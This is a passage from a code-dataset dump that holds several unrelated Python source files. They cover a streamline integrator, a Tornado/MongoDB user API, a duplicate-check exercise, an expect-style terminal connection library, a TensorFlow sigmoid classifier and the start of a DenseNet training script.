*U*, *V* in the same units as *x0*, *y0*.\n\n *tol* is the tolerance threshold, below which a streamline is considered\n stationary and aborted.\n\n *momentum* allows a streamline to continue moving across a plateau. (not\n implemented)\n \"\"\"\n\n m, n = U.shape\n\n # Initialize streamline vectors\n X = [x0]\n Y = [y0]\n\n # Adjust the input arrays to make them have resolution 1x1\n U = U / res[0]\n V = V / res[1]\n\n # Put x0, y0 into grid units\n x0 = x0 / res[0]\n y0 = y0 / res[1]\n\n # Check that x0, y0 are within the bounds of U, V\n if (x0 >= n-1) or (y0 >= m-1) or (x0 < 0) or (y0 < 0):\n raise IndexError(\"starting position is outside vector field\")\n\n i = 0\n\n while i < max_nodes:\n\n try:\n\n # Use linear interpolation to find dx/ds and dy/ds at (x0, y0)\n dxds = interpolate1(x0 % 1.0, y0 % 1.0,\n U[y0, x0], U[y0, ceil(x0)],\n U[ceil(y0), x0], U[ceil(y0), ceil(x0)])\n dyds = interpolate1(x0 % 1.0, y0 % 1.0,\n V[y0, x0], V[y0, ceil(x0)],\n V[ceil(y0), x0], V[ceil(y0), ceil(x0)])\n\n k1x = ds * dxds\n k1y = ds * dyds\n\n dxds = interpolate1(x0 % 1.0 + 0.5*ds, y0 % 1.0 + 0.5*k1x,\n U[y0, x0], U[y0, ceil(x0)],\n U[ceil(y0), x0], U[ceil(y0), ceil(x0)])\n dyds = interpolate1(x0 % 1.0 + 0.5*ds, y0 % 1.0 + 0.5*k1y,\n V[y0, x0], V[y0, ceil(x0)],\n V[ceil(y0), x0], V[ceil(y0), ceil(x0)])\n\n k2x = ds * dxds\n k2y = ds * dyds\n\n dxds = interpolate1(x0 % 1.0 + 0.5*ds, y0 % 1.0 + 0.5*k2x,\n U[y0, x0], U[y0, ceil(x0)],\n U[ceil(y0), x0], U[ceil(y0), ceil(x0)])\n dyds = interpolate1(x0 % 1.0 + 0.5*ds, y0 % 1.0 + 0.5*k2y,\n V[y0, x0], V[y0, ceil(x0)],\n V[ceil(y0), x0], V[ceil(y0), ceil(x0)])\n\n k3x = ds * dxds\n k3y = ds * dyds\n\n dxds = interpolate1(x0 % 1.0 + ds, y0 % 1.0 + k3x,\n U[y0, x0], U[y0, ceil(x0)],\n U[ceil(y0), x0], U[ceil(y0), ceil(x0)])\n dyds = interpolate1(x0 % 1.0 + ds, y0 % 1.0 + k3y,\n V[y0, x0], V[y0, ceil(x0)],\n V[ceil(y0), x0], V[ceil(y0), ceil(x0)])\n\n k4x = ds * dxds\n k4y = ds * dyds\n\n x0 = x0 + k1x/6.0 + k2x/3.0 + k3x/3.0 + k4x/6.0\n y0 = y0 + k1y/6.0 + k2y/3.0 + k3y/3.0 + k4y/6.0\n\n except IndexError: # x0 or y0 was an invalid (e.g. nan)\n break\n\n # Check that x0, y0 are within the bounds of U, V\n if (x0 >= n-1) or (y0 >= m-1) or (x0 < 0) or (y0 < 0):\n break\n\n X.append(x0*res[0])\n Y.append(y0*res[1])\n\n # Check that rate of change is greater than the tolerance limit\n if tol is not None:\n if sqrt( k4x**2 + k4y**2 ) < tol:\n break\n\n i += 1\n\n return X, Y\n\n\n","sub_path":"karta/raster/streamline.py","file_name":"streamline.py","file_ext":"py","file_size_in_byte":4102,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"421971542","text":"import os\nfrom tornado import ioloop,web\nfrom pymongo import MongoClient\nimport json\nfrom bson import json_util\nfrom bson.objectid import ObjectId\nfrom model.user import User\n\nMONGODB_DB_URL = 'mongodb://localhost:27017/'\nMONGODB_DB_NAME = 'evento'\n\nclient = MongoClient(MONGODB_DB_URL)\ndb = client[MONGODB_DB_NAME]\n\nclass IndexHandler(web.RequestHandler):\n\tdef get(self):\n\t\tself.render(\"index.html\")\n\nclass UsersHandler(web.RequestHandler):\n\t\n\tdef get(self):\n\t\tusers = User()\n\t\tself.set_header(\"Content-Type\", \"application/json\")\n\t\tself.write(json.dumps(list(users),default=json_util.default))\n\n\tdef post(self):\n\t\tuser_data = json.loads(self.request.body.decode('utf-8'))\n\t\tuser_id = db['usuarios'].insert(user_data)\n\t\tprint('user created with id ' + str(user_id))\n\t\tself.set_header(\"Content-Type\", \"application/json\")\n\t\tself.set_status(201)\n\nsettings = {\n \"template_path\": os.path.join(os.path.dirname(__file__), \"templates\"),\n \"static_path\": os.path.join(os.path.dirname(__file__), \"static\"),\n \"debug\" : True\n}\n\napplication = web.Application([\n\t(r'/', IndexHandler),\n\t(r'/index', IndexHandler),\n\t(r'/api/v1/users',UsersHandler),\n\t\n],**settings)\n\nif __name__ == \"__main__\":\n\tapplication.listen(8000)\n\tioloop.IOLoop.instance().start()\n","sub_path":"tornadoapp.py","file_name":"tornadoapp.py","file_ext":"py","file_size_in_byte":1245,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"341776427","text":"\"\"\"\nGiven an array of integers, find if the array contains any duplicates.\n\nYour function should return true if any value appears at least twice in the array, and it should return false if every element is distinct.\n\nExample 1:\n Input: [1,2,3,1]\n Output: true\n\n\nExample 2:\n Input: [1,2,3,4]\n Output: false\n\nExample 3:\n Input: [1,1,1,3,3,4,3,2,4,2]\n Output: true\n\"\"\"\n\ndef containsDuplicate(nums):\n is_contain = False\n unique = set()\n for num in nums:\n if num in unique:\n is_contain = True\n break\n else:\n unique.add(num)\n return is_contain\n\ninput1 = [1,2,3,1]\ninput2 = [1,2,3,4]\ninput3 = [1,1,1,3,3,4,3,2,4,2]\n\nprint(containsDuplicate(input3))\n","sub_path":"LeetCode-Python/217 Contains Duplicate.py","file_name":"217 Contains Duplicate.py","file_ext":"py","file_size_in_byte":719,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"535298928","text":"import logging\nimport re\nimport socket\nimport time\n\nfrom test_envi.connections import constants, decorators\n\nfrom io import StringIO\n\nfrom test_envi.utils.strings import escape_string\nfrom . import shells\nfrom .. import settings, expect, exceptions, base\nfrom ..base import mixins\nfrom test_envi import utils\n\n\nlog = logging.getLogger(__name__)\n\n__author__ = 'Filinto Duran (duranto@gmail.com)'\n\nPASSWORD_PROMPT_REGEX = r'(?i)password[^:]*:'\n\ndef _remove_cmd_from_buffer(buff, cmd_line_counter, cmd_lines, cmd_lines_num, cmd_removed):\n \"\"\" helper function for _expect_cmd \"\"\"\n for cmd_line in cmd_lines[cmd_line_counter:]:\n command_at = buff.find(cmd_line)\n if command_at != -1:\n cmd_line_counter += 1\n buff = buff[command_at + len(cmd_line):]\n if cmd_line_counter == cmd_lines_num:\n cmd_removed = True\n\n return buff, cmd_removed\n\n\ndef _get_string_to_match(buff, _check_match):\n string_to_match = buff\n\n # we are limiting the comparison to sections between the reset_on_sep char value (like new line)\n nl_index = buff.find('\\n')\n # if we find a separator string/char\n while nl_index != -1:\n string_to_match = buff[:nl_index]\n # buff is initialized with the section after the reset_on_sep char for comparison\n buff = buff[nl_index + 1:]\n # compare against our expected values\n if _check_match(string_to_match):\n break\n\n nl_index = buff.find('\\n')\n else: # nobreak\n return string_to_match, buff, False\n\n return None, None, True\n\n\nclass TerminalConnection(base.Connection, mixins.CanExecuteCommands):\n \"\"\" utility class to handle interactive connections with expect-like functionality and login tracking \"\"\"\n\n def __init__(self, connections=(), close_base_on_exit=True, allow_non_expected_prompt=False, stderr_to_tmp=False,\n rtt=0.5, check_same_prompt_when_opening_terminal=True, **shell_kwargs):\n \"\"\"\n\n Args:\n base_conn (channel.TerminalChannel):\n close_base_on_exit:\n allow_non_expected_prompt:\n stderr_to_tmp:\n rtt:\n\n Returns:\n\n \"\"\"\n if connections and not hasattr(connections, '__iter__'):\n connections = [connections]\n\n self._terminals = [] # hackish - dummy shell object to get pass the super init\n self.__base_chan_kwargs = shell_kwargs\n super(TerminalConnection, self).__init__()\n\n self.check_same_prompt_when_opening_terminal = check_same_prompt_when_opening_terminal\n self.connections = list(connections)\n self._close_base_on_exit = close_base_on_exit\n\n self.stderr_to_tmp = stderr_to_tmp\n self.allow_non_expected_prompt = allow_non_expected_prompt\n\n # last command sent\n self.last_cmd_sent = ''\n\n # time between sent and receive data. some cmds are more computationally intensive\n self.rtt = rtt\n\n self.sleep_time_after_no_data = 0.1\n\n def __repr__(self):\n base_conn = []\n\n for c in self.connections:\n base_conn.append(c.__repr__())\n\n return (\"TerminalConnection({base_conn}, close_base_on_exit={close_on_exit}, \"\n \"allow_unknown_prompt={allow_prompt}, stderr_to_tmp={stderr}, rtt={rtt}\".format(\n base_conn=base_conn, close_on_exit=self._close_base_on_exit,\n allow_prompt=self.allow_non_expected_prompt, stderr=self.stderr_to_tmp, rtt=self.rtt))\n\n def _open_transport(self, **kwargs):\n try:\n self.connections[0].open()\n kwargs = utils.lists.setdefault(kwargs, self.__base_chan_kwargs)\n self._transport = self.connections[0].open_terminal_channel(**kwargs)\n self._transport.set_keepalive(settings.SOCKET_KEEPALIVE_PERIOD)\n self.find_login_info(self._transport)\n # multi level login\n for conn in self.connections[1:]:\n self.open_terminal_from_terminal(conn)\n time.sleep(0.05)\n except exceptions.ConnectionError:\n self._close_transport()\n log.exception('problems connecting...')\n raise\n \n if self.allow_non_expected_prompt:\n self.connections[0].expected_prompt = self._terminals[0].shell.prompt\n\n def open_terminal_from_terminal(self, conn, **kwargs):\n terminal = conn.open_terminal_from_terminal(self, **kwargs)\n self.find_login_info(terminal)\n\n def _close_transport(self):\n try:\n self.last_cmd_sent = ''\n self._terminals = []\n if self._transport:\n self._transport.close()\n if self._close_base_on_exit:\n self.connections[0].close()\n\n except Exception:\n pass\n\n # TODO: make a copy of conn to avoid overwriting conn info.... how deep???\n @decorators.must_be_close\n def through(self, conn):\n if isinstance(conn, TerminalConnection):\n self.connections = list(conn.connections) + self.connections\n else:\n self.connections.insert(0, conn)\n return self\n\n def _is_active(self):\n return self.is_open and self._transport.is_active()\n\n @property\n def os(self):\n return self.current.os\n\n @property\n def host(self):\n try:\n return self._transport.conn.host\n except AttributeError:\n log.warning('trying to get host from not opened terminal')\n return None\n\n @property\n def prompt(self):\n return self.current.shell.prompt\n\n @prompt.setter\n def prompt(self, value):\n self.current.shell.prompt = value\n\n # TODO: check if we can remove this property if we don't see any need to double new lines\n @property\n def new_line(self):\n try:\n return self.current.shell.new_line\n except Exception:\n return '\\n'\n\n @new_line.setter\n def new_line(self, value):\n self.current.shell.new_line = value\n\n @property\n def current(self):\n try:\n return self._terminals[-1]\n except Exception:\n return None\n\n @property\n def timeout(self):\n return self._timeout\n\n @timeout.setter\n def timeout(self, value):\n self._timeout = self.current.shell.timeout = value\n\n def recv(self, buffer_size=None):\n if buffer_size is None:\n buffer_size = self.buffer_size\n data = self._transport.recv(buffer_size)\n if data:\n data = utils.regex.strip_ansi_codes_from_buffer(data)\n self.data.new_received(data)\n return data\n\n def recv_wait(self, wait_for, buffer_size=None):\n data = ''\n with utils.classes.SimpleTimer(wait_for) as timer:\n while timer.has_not_expired:\n d = self.recv(buffer_size)\n if d:\n data += d\n return data\n\n def get_file(self, *args, **kwargs):\n if len(self.connections) == 1:\n return self.current.conn.get_file(*args, **kwargs)\n else:\n raise NotImplementedError(\"The multi-level connections get file is not implemented yet\")\n\n def get_file_via_cat(self, remote_file, local_path='', cat_cmd='cat', use_sudo=False,\n overwrite=False, timestamp=False):\n from test_envi.connections.base.mixins import get_local_path_from_remote_file\n local_path = get_local_path_from_remote_file(remote_file, local_path, overwrite, timestamp)\n with open(local_path, 'w') as f:\n self.check_output(cat_cmd + ' ' + remote_file, use_sudo=use_sudo, recv_stream=f, reset_on_new_line=True)\n\n return local_path\n\n def put_file(self, *args, **kwargs):\n if len(self.connections) == 1:\n return self.current.conn.put_file(*args, **kwargs)\n else:\n raise NotImplementedError(\"The multi-level connections put file is not implemented yet\")\n\n def get_response(self, timeout=0.1, force_ctrl_c=False):\n \"\"\"\n\n Args:\n timeout: time to wait before forcing a ctrl-c to the previous action\n\n Returns:\n\n \"\"\"\n return self.flush_recv(timeout=timeout, force_ctrl_c=force_ctrl_c).data.get_last_recv()\n\n def __get_last_line_prompt(self, data_received_lines):\n last_line = data_received_lines.pop()\n len_last_line_split = len(last_line.split())\n if len_last_line_split >= 2:\n last_line = last_line.split(maxsplit=len_last_line_split - 1)[-1]\n return last_line\n \n def _get_banner_and_prompt(self, terminal, previous_prompt=None):\n \"\"\" Get information about a new login (message of the day and prompt).\n\n It cycles reading a socket until it times out to automatically retrieve the banner message (motd) and the prompt.\n If given the expected_prompt, we will only wait until we get expected_prompt or login_timeout whoever is first\n\n \"\"\"\n\n # send a new line\n self.send_line()\n data_received, prompt_timer_expired, prompt_found = self._find_prompt(terminal, terminal.shell.prompt)\n\n if not data_received:\n raise exceptions.ExpectLoginError('Did not get any banner message or prompt???')\n\n data_received_lines = data_received.splitlines()\n prompt = re.escape(prompt_found or self.__get_last_line_prompt(data_received_lines))\n banner = '\\n'.join(data_received_lines)\n\n if previous_prompt and prompt == previous_prompt and self.check_same_prompt_when_opening_terminal:\n raise exceptions.ExpectLoginError('The prompt is still the same ({}). '\n 'We might have not logged into anywhere'.format(previous_prompt))\n\n elif not self.allow_non_expected_prompt and terminal.shell.prompt and prompt_timer_expired:\n raise exceptions.ExpectLoginError('The expected prompt {} is different to the one we got {}. '\n 'We must be in the wrong place'.format(terminal.shell.prompt, prompt))\n else:\n return banner, prompt\n\n def _find_prompt(self, terminal, new_prompt=None, timeout=0):\n prompt_regex = re.compile(new_prompt, re.M) if new_prompt else None\n\n data_received = ''\n if not timeout:\n timeout = terminal.shell.connect_timeout\n\n prompt_found = ''\n\n with utils.classes.SimpleTimer(timeout) as timer:\n while timer.has_not_expired:\n if prompt_regex:\n m = prompt_regex.search(data_received)\n if m:\n prompt_found = m.group(0)\n break\n try:\n data = self.recv() \n if data:\n data_received += data\n\n except exceptions.ConnectionReadTimeoutError:\n break\n\n return data_received, timer.has_expired, prompt_found\n\n def set_prompt(self, new_prompt, timeout=0):\n if new_prompt == self.prompt:\n return True\n\n set_prompt_cmd = self.current.os.cmd.set_prompt(new_prompt)\n self.send_cmd(set_prompt_cmd)\n self.send_line()\n\n data_received, prompt_was_not_found, _ = self._find_prompt(self.current, new_prompt, timeout=timeout)\n\n if prompt_was_not_found:\n log.error(\"we could not change the prompt from ({}) to ({}) using command ({}). Output: {}\"\n \"\".format(self.prompt, new_prompt, set_prompt_cmd, data_received))\n raise exceptions.CalledProcessError(-1, set_prompt_cmd, data_received)\n else:\n log.debug(\"New prompt successfully changed.\")\n self.prompt = new_prompt\n\n def _check_output_nb(self, command, **kwargs):\n pass\n\n def check_output(self, command, use_sudo=False, stderr_to_tmp=False, stderr_to_out=False, recv_stream=None,\n **kwargs):\n\n command = self._get_cmd(command, use_sudo, stderr_to_tmp)\n send = self.send_with_stderr if stderr_to_out else self.send_cmd\n\n send(command, recv_stream=recv_stream)\n\n if use_sudo:\n e = self.expect(expect.ExpectedRegex(PASSWORD_PROMPT_REGEX, name='password'), \n expect.ExpectedPrompt(),\n **kwargs)\n\n if e.matched and e.matched_index == 0:\n e = send(self.current.conn.password).expect_prompt(**kwargs)\n else:\n e = self.expect_prompt(**kwargs)\n\n if e.matched:\n log.debug('<<< Matched Received: \\n' + e.string_before_match)\n return e.string_before_match.rstrip('\\n')\n\n raise exceptions.CalledProcessError(-1, command,\n \"Did not find prompt ({}). \"\n \"This is the output we got: {}\"\n \"\".format(self.prompt, self.data.get_last_recv()))\n\n def flush_recv(self, force_ctrl_c=True, timeout=0.1):\n \"\"\" flushes the receive buffer\n Args:\n force_ctrl_c: flag to indicate that if we timeout try sending a control c, in case we have a long running task\n timeout: timeout to keep reading the buffer while data is present\n\n Returns:\n\n \"\"\"\n t0 = time.time()\n flush_data = 1\n while (time.time() - t0 < timeout) and flush_data:\n try:\n flush_data = self.recv()\n except Exception:\n break\n\n remaining_time = time.time() - t0\n if remaining_time >= timeout:\n if force_ctrl_c:\n self.send_ctrl_c()\n self.flush_recv(False, timeout=remaining_time)\n\n return self\n\n def send_cmd(self, cmd, flush=True, recv_stream=None):\n if flush and self.last_cmd_sent:\n self.flush_recv()\n return self.send(cmd, True, recv_stream=recv_stream)\n\n def send_cmds(self, cmds, time_between=0.1, flush=True, recv_stream=None):\n if flush and self.last_cmd_sent:\n self.flush_recv()\n for cmd in cmds:\n self.send(cmd, True, recv_stream=recv_stream)\n time.sleep(time_between)\n return self\n \n def send_sudo_cmd(self, cmd, password=None, password_regex=r'(?i)password[^:]*:'):\n try:\n expect_return = self.send_cmd('sudo ' + cmd).expect_regex(password_regex)\n\n except socket.timeout:\n log.exception('did not find password. maybe we did not need password?')\n raise\n\n else: \n self.send_cmd(password or self.current.conn.password)\n return self\n \n def send_confirmed_password(self, password=None, password_regex=PASSWORD_PROMPT_REGEX, cmd_is_hidden=False):\n password = password or self.current.conn.password\n \n self.expect_regex(password_regex, cmd_is_hidden=cmd_is_hidden)\n self.send_cmd(password)\n self.expect_regex(password_regex, cmd_is_hidden=True)\n self.send_cmd(password)\n \n return self.expect_prompt(cmd_is_hidden=True, chain=True)\n\n def send_ctrl_c(self):\n return self.send(\"\\x03\").send_line(False)\n\n def send_line(self, flush=True):\n return self.send_cmd('', flush)\n\n enter = send_line\n\n def send_with_stderr(self, cmd, flush=True, recv_stream=None):\n return self.send_cmd(cmd + \" 2>&1\", flush, recv_stream=recv_stream)\n\n def send(self, cmd, new_line=False, metadata=None, recv_stream=None):\n cmd = str(cmd).strip()\n if new_line:\n # add new line to command if not given already\n if not cmd or cmd[-len(self.new_line)] != self.new_line:\n cmd += self.new_line\n\n log.debug(\"{}{} - Sending cmd/data: {}\".format('' if not metadata else 'MetaInfo: {}'.format(metadata),\n self.__class__.__name__, escape_string(cmd)))\n self._transport.send(cmd)\n self.last_cmd_sent = cmd\n self.data.new_sent(cmd, metadata=metadata, recv_stream=recv_stream)\n return self\n\n def log_recv(self):\n log.debug('<<< Received: \\n{}'.format(escape_string(self.data.get_last_recv())))\n\n def expect(self, *expect_value_list, **kwargs):\n exp_object = expect.Expect(self.last_cmd_sent)\n for v in expect_value_list:\n if not isinstance(v, expect.ExpectedRegex):\n v = expect.ExpectedRegex(v)\n exp_object.add(v)\n return self._expect_cmd(exp_object, **kwargs)\n\n def exec_ask_response_list(self, ask_response_list, stop_after_count_matches=0, stop_after_getting=None,\n timeout_after_first_match=0, remove_prompt_to_compare=True, **kwargs):\n \"\"\" simple procedure to go through a list of expected values and their corresponding responses (not an automata)\n\n note: values are expected only once, so if you expect it more times add the same one more than one\n\n Args:\n ask_response_list:\n stop_after_count_matches:\n **kwargs:\n\n Returns:\n\n \"\"\"\n expect_list = {}\n\n ask_resp_list_by_name = dict([(r.get('name', str(i)), r) for (i, r) in enumerate(ask_response_list)])\n\n for name, r in ask_resp_list_by_name.items():\n expect_list[name] = expect.ExpectedRegex(r['ask'], name=name, flags=r.get('flags', re.I),\n remove_prompt_to_compare=remove_prompt_to_compare)\n\n i = 0\n match_set = set()\n\n if stop_after_count_matches:\n stop_after_count_matches = min(stop_after_count_matches, len(ask_response_list))\n else:\n stop_after_count_matches = len(ask_response_list)\n\n while i < stop_after_count_matches:\n exp = self.expect(*expect_list.values(), **kwargs)\n if exp.matched:\n self.send_cmd(ask_resp_list_by_name[exp.matched_name]['resp'])\n kwargs['cmd_is_hidden'] = ask_resp_list_by_name[exp.matched_name].get('hidden', False)\n\n match_set.add(exp.matched_name)\n del expect_list[exp.matched_name]\n\n if stop_after_getting is not None and exp.matched_name == stop_after_getting or \\\n exp.matched_name == 'prompt':\n return match_set\n\n if timeout_after_first_match:\n kwargs['timeout'] = timeout_after_first_match\n else:\n return match_set\n i += 1\n\n return match_set\n\n def expect_all(self, *expect_value_list, **kwargs):\n kwargs.setdefault('all_matches_required', True)\n return self.expect(*expect_value_list, **kwargs)\n\n def expect_all_in_sequence(self, *expect_value_list, **kwargs):\n kwargs.setdefault('all_matches_required', True)\n kwargs.setdefault('all_matches_in_sequence', True)\n return self.expect(*expect_value_list, **kwargs)\n\n def expect_regex(self, regex, flags=0, timeout=0, **kwargs):\n return self.expect(expect.ExpectedRegex(regex, flags), timeout=timeout, **kwargs)\n\n def expect_string(self, string, timeout=0, **kwargs):\n return self.expect(expect.ExpectedString(string), timeout=timeout, **kwargs)\n\n def expect_prompt(self, timeout=0, **kwargs):\n return self.expect(expect.ExpectedPrompt(), timeout=timeout, **kwargs)\n\n def expect_istring(self, string, timeout=0, **kwargs):\n kwargs.setdefault('flags', 0)\n kwargs['flags'] |= re.I\n return self.expect(expect.ExpectedString(string), timeout=timeout, **kwargs)\n\n def expect_new_prompt(self, new_prompt=None, timeout=0):\n self.get_new_prompt(timeout=timeout, new_prompt=new_prompt)\n\n return self.send_line().expect_prompt()\n\n def find_login_info(self, terminal):\n\n if terminal == self.current:\n raise ValueError('The channel provided is the same as the current. There must be an error.')\n\n old_prompt = self.prompt if self._terminals else None\n terminal.shell.banner, terminal.shell.prompt = self._get_banner_and_prompt(terminal, old_prompt)\n self._terminals.append(terminal)\n\n def expect_logout(self):\n old_shell = self._terminals.pop()\n try:\n exp = self.send_line().expect_prompt()\n if not exp.matched:\n raise exceptions.ExpectLoginError('expecting logout but did '\n 'not get the previous terminal prompt: ' + self.prompt)\n else:\n return exp\n except Exception:\n self._terminals.append(old_shell)\n raise\n\n def get_new_prompt(self, timeout=0, update=True, new_prompt=None):\n data, prompt_was_not_found, prompt_found = self._find_prompt(self.current, new_prompt=new_prompt, timeout=timeout)\n\n if not data:\n raise exceptions.CalledProcessError(-1, self.last_cmd_sent, data)\n \n elif update:\n self.prompt = re.escape(prompt_found or data.splitlines()[-1])\n\n return self.prompt\n\n def record(self, timeout=None, record_stop_signal=None, output_stream=None, time_to_sleep_between_recv=None):\n\n time_to_sleep_between_recv = time_to_sleep_between_recv or self.sleep_time_after_no_data\n\n timer = utils.classes.get_timer_from_timeout(timeout)\n\n stream = output_stream or StringIO()\n\n while not (self.stop_signal.is_set() or\n record_stop_signal and record_stop_signal.is_set() or\n timer and timer.has_expired):\n\n recv = self.recv()\n\n if recv == 0:\n self.close()\n log.error('recv command return empty string. End side might have been closed!')\n raise socket.error\n\n elif recv != constants.SOCKET_RECV_NOT_READY:\n stream.write(recv)\n\n else:\n time.sleep(time_to_sleep_between_recv)\n\n return stream\n\n def _expect_cmd(self, expect_cmd, timeout=None, reset_on_new_line=False, cmd_is_hidden=False, chain=False):\n\n def _check_match(comp_buff):\n return comp_buff and expect_cmd.find_expected_values_and_prompt_in_buffer(comp_buff, self.prompt)\n\n # accumulated responses from server\n buff = ''\n\n # reset expected values counter in case we are reusing an expect object\n expect_cmd.reset()\n\n cmd_removed = cmd_is_hidden\n\n # get cmd info and weather the command has multiple lines\n cmd = str(expect_cmd.command)\n cmd_lines = cmd.splitlines(True)\n cmd_lines_num = len(cmd_lines)\n cmd_line_counter = 0\n\n # flag to check if at least one recv was successful before socket timeout\n received_anything = found_match = False\n\n # timer\n timer = utils.classes.get_timer_from_timeout(timeout or self.timeout)\n\n try:\n match_found = False\n while not(match_found or timer.has_expired or self.stop_signal.is_set()):\n\n recv = self.recv()\n\n if recv == 0:\n self.close()\n log.error('recv command return empty string. End side might have been closed!')\n raise socket.error\n\n elif recv != constants.SOCKET_RECV_NOT_READY:\n received_anything = True\n\n buff += recv \n\n if not cmd_removed:\n buff, cmd_removed = _remove_cmd_from_buffer(buff, cmd_line_counter, cmd_lines, cmd_lines_num,\n cmd_removed)\n if cmd_removed:\n\n if reset_on_new_line:\n string_to_match, buff, found_match = _get_string_to_match(buff, _check_match)\n if found_match:\n break\n else:\n string_to_match = buff \n\n if _check_match(string_to_match):\n break\n\n else:\n time.sleep(self.sleep_time_after_no_data)\n\n else: # no break\n\n if timer.has_expired:\n raise exceptions.ConnectionReadTimeoutError('failed to match before timeout: '\n '' + str(timeout or self.timeout))\n\n except socket.timeout:\n\n log.debug('Did not receive any data for a while ' + str(expect_cmd))\n\n if not received_anything:\n log.error('Did not receive any data before the socket timeout ({}). Increase the timeout or '\n 'check the command or system under test.'.format(str(self._transport.timeout)))\n raise socket.error\n\n if not chain:\n return expect_cmd\n else:\n return self\n\n\n def _update_login(self, results, number_of_lines_for_prompt, new_line, shell=None):\n results.seek(0)\n welcome_message_lines = results.read().splitlines()\n prompt = '\\n'.join(welcome_message_lines[len(welcome_message_lines) - number_of_lines_for_prompt:])\n\n if shell is None:\n shell = shells.LoginShell()\n\n # checks if expected prompt is the one we got and if we are not skipping the check raise an exception\n if shell.prompt is None and re.search(self.prompt, prompt) and not shell.skip_prompt_check:\n raise exceptions.ExpectLoginError\n\n shell.update(welcome_message=welcome_message_lines[:-number_of_lines_for_prompt],\n prompt=prompt, number_of_lines_for_prompt=number_of_lines_for_prompt,\n new_line=new_line)\n # do not copy if it is already added\n if self._terminals[-1] != shell:\n self._terminals.append(shell)\n\n","sub_path":"course/test_envi/connections/terminal/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":26124,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"593569097","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nstep03_sigmoid_classifier.py\r\n\r\n - 활성함수(activatio functon) : sigmoid\r\n - 손실함수(loss function) : cross entropy \r\n\"\"\"\r\n\r\nimport tensorflow.compat.v1 as tf # ver1.x\r\ntf.disable_v2_behavior() # ver2.x 사용 안함 \r\n\r\nfrom sklearn.metrics import accuracy_score # model 평가 \r\n\r\n# 1. x, y 공급 data \r\n# x변수 : [hours, video]\r\nx_data = [[1, 2], [2, 3], [3, 1], [4, 3], [5, 3], [6, 2]] # [6,2]\r\n\r\n# y변수 : binary data (fail or pass)\r\ny_data = [[0], [0], [0], [1], [1], [1]] # [6, 1] \r\n\r\n# 2. X, Y변수 정의 \r\nX = tf.placeholder(dtype=tf.float32, shape = [None, 2])#[관측치,입력수]\r\nY = tf.placeholder(dtype=tf.float32, shape = [None, 1])#[관측치,출력수]\r\n\r\n# 3. w,b 변수 정의 \r\nw = tf.Variable(tf.random_normal([2, 1]))# [입력수, 출력수]\r\nb = tf.Variable(tf.random_normal([1])) # [출력수]\r\n\r\n# 4. sigmoid 분류기 \r\n# (1) model : 예측치 \r\nmodel = tf.matmul(X, w) + b # 회귀방정식 \r\nsigmoid = tf.sigmoid(model) # 활성함수 적용(0 ~ 1 확률) \r\n\r\n# (2) loss function : Entropy 수식 = -sum(Y * log(model)) \r\nloss = -tf.reduce_mean(Y * tf.log(sigmoid) + (1-Y) * tf.log(1-sigmoid))\r\n\r\n# (3) optimizer \r\n'''\r\nopt = tf.train.GradientDescentOptimizer(0.1)\r\ntrint = opt.minimize(loss)\r\n'''\r\ntrain = tf.train.GradientDescentOptimizer(0.1).minimize(loss) # 최적화 객체 \r\n\r\n# (4) cut-off : 0.5\r\ncut_off = tf.cast(sigmoid > 0.5, tf.float32) # T/F -> 1.0/0.0\r\n\r\n# 5. model training\r\nwith tf.Session() as sess :\r\n sess.run(tf.global_variables_initializer()) # w, b 초기화\r\n \r\n feed_data = {X : x_data, Y : y_data} # 공급 data \r\n \r\n # 반복학습 : 500회 \r\n for step in range(500) : \r\n _, loss_val = sess.run([train, loss], feed_dict = feed_data)\r\n \r\n if (step+1) % 50 == 0 :\r\n print(\"step = {}, loss = {}\".format(step+1, loss_val))\r\n \r\n # model 최적화 \r\n y_true = sess.run(Y, feed_dict = feed_data) \r\n y_pred = sess.run(cut_off, feed_dict = feed_data) \r\n \r\n acc = accuracy_score(y_true, y_pred)\r\n print(\"accuracy = \", acc) # 1.0\r\n \r\n print(\"y_true :\", y_true)\r\n print(\"y_pred :\", y_pred)\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n\r\n\r\n\r\n\r\n","sub_path":"chap04_Classifier/lecture_1x/step03_sigmoid_classifier.py","file_name":"step03_sigmoid_classifier.py","file_ext":"py","file_size_in_byte":2304,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"632685951","text":"import tensorflow as tf\nimport os\nimport argparse\n\n\ndef parse_example(example):\n \"\"\"\n 解析样本\n :param example:\n :return:\n \"\"\"\n keys_to_features = {\n 'audio': tf.VarLenFeature(tf.float32),\n 'label': tf.VarLenFeature(tf.float32),\n }\n parsed = tf.parse_single_example(example, keys_to_features)\n audios = tf.sparse_tensor_to_dense(parsed['audio'], default_value=0)\n labels = tf.sparse_tensor_to_dense(parsed['label'], default_value=0)\n return audios, labels\n\n\ntrain_path = os.path.join('/home/ccyoung/DCase', 'train.tfrecords')\ntest_path = os.path.join('/home/ccyoung/DCase', 'test.tfrecords')\n\n\ndef create_model():\n from densenet2 import DenseNet\n # dense_net = DenseNet(7, 12, 3, 10, 5,\n # bottleneck=True, compression=0.5, weight_decay=1e-4, dropout_rate=0.2, pool_initial=False,\n # include_top=True)\n\n # return dense_net.build(input_shape=(128, 47, 2)\n # )\n return DenseNet(7, args.grow_rate, args.n_db, 10, args.nb_layers, data_format=args.data_format,\n bottleneck=True, compression=0.5, weight_decay=1e-4, dropout_rate=0.2, pool_initial=False,\n include_top=True)\n\n\ndef model_fn(features, labels, mode, params):\n model = create_model()\n\n if mode == tf.estimator.ModeKeys.TRAIN:\n optimizer = tf.train.MomentumOptimizer(0.001, momentum=0.9, use_nesterov=True)\n\n logits = model(features)\n print(labels.shape)\n loss = tf.losses.sparse_softmax_cross_entropy(labels=tf.argmax(labels, axis=1, output_type=tf.int64), logits=logits) + tf.add_n(model.losses)\n accuracy = tf.metrics.accuracy(\n labels=tf.argmax(labels, axis=1, output_type=tf.int64), predictions=tf.argmax(logits, axis=1, 